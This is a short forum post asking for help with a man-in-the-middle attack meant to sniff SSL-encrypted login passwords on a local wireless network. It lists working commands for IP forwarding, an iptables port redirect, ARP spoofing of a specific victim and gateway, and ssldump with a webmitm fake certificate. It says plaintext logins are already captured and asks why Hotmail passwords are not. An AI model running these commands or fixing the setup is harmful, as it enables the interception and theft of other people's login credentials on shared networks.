I know there are many topics about sniffing ssl encrypted passwords but when i searched i couldnt find exactly what i wanted.Here is what i ve been trying first :
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
arpspoof -i wlan0 -t 192.168.2.3 192.168.2.1
ssldump -n -d -k webmitm.crt | tee ssldump.log
And it starts working but when i try to login hotmail to test it,i cant find my password in logs.But if i try a non-ssl encrypted login,it shows my password.
I think it has to be something about webmitm but i cant figure it out.
And when i first open webmitm,it asks to fill in some blanks for fake certificate i think.Do i have to fill it?
Anyways,what am i doing wrong in here?